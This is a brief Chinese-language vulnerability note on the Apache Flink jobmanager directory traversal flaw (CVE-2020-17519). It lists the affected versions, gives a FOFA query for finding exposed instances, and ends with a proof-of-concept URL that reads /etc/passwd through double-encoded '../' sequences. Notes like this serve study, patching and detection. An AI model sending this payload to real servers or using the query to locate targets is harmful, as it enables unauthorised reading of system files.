Apache Flink jobmanager 目录遍历漏洞 CVE-2020-17519¶

漏洞描述¶

2021年01月06日，360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞,目录穿越漏洞的风险通告，漏洞编号为CVE-2020-17518,CVE-2020-17519，漏洞等级：高危，漏洞评分：8.5。 远程攻击者通过REST API目录遍历，可造成文件读取/写入的影响。

漏洞影响¶

Apache Flink 1.11.0 Apache Flink 1.11.1 Apache Flink 1.11.2

网络测绘¶

FOFA: app="Apache Flink"

环境搭建¶

漏洞复现¶

验证POC

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd